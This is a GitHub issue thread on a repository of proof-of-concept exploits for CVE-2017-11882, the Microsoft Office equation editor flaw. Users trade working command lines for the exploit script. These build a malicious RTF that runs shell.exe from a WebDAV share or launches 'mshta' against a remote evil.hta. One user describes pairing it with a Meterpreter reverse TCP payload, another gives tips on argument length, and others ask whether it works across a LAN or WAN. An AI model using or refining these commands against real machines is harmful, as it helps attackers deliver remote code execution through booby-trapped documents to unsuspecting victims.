embedi / CVE-2017-11882

Proof-of-Concept exploits for CVE-2017-11882

Script argument question #2

Open securitaydude opened 7 years ago

securitaydude commented 7 years ago

Greetings. It appears that in order for this script to work (for me), I had to supply the following arguments to the script: python webdav_exec_CVE-2017-11882.py -u \\\\192.168.x.x\\webdav -e \\\\192.168.x.x\\webdav\\shell.exe -o text.rtf. Otherwise, if I did this: python webdav_exec_CVE-2017-11882.py -u \\192.168.x.x\webdav -e \\192.168.x.x\webdav\shell.exe -o text.rtf, I would get an error from Word saying it could not find the resource at \192.168.x.xwebdav. It appears that the Python script, on my end, needed the backslash character to escape the backslash. I was able to weaponize (I think) this exploit using Meterpreter's handler and a Meterpreter reverse TCP payload. However, when I enter the WebDAV path in Windows using Win+R, Windows somehow opens up the WebDAV location in Explorer before the Meterpreter session can be established. Is anyone else, or you, experiencing this? Is this normal behavior?

X0R1972 commented 7 years ago

Thank you for this question. I myself tried the same thing as you... I wrote the command like you did, but for me it simply is not working; when I open the Office doc in Windows, nothing happens. It would be nice if the owner of this exploit showed us the right syntax and command to use, so we know exactly what to put in the command.

ptyin commented 7 years ago

First things first: you should use a URL instead of a UNC path. This URL is your server location, and the -e option should be a command (like "mshta http://192.168.3.106/evil.hta") under your server location. The second thing is that I think your -u and -e options are too long to use. They should be shorter than 43 bytes. (MY ENGLISH IS HORRIBLE, SORRY ABOUT THAT)

isabellah750 commented 7 years ago

How do you tell your server location without the IP address? Kindly help me understand how it is working. And can it work on a LAN?

X0R1972 commented 7 years ago

Another question. I hope it's not a stupid one; if it is, sorry. Does this exploit work only locally, or also over a WAN?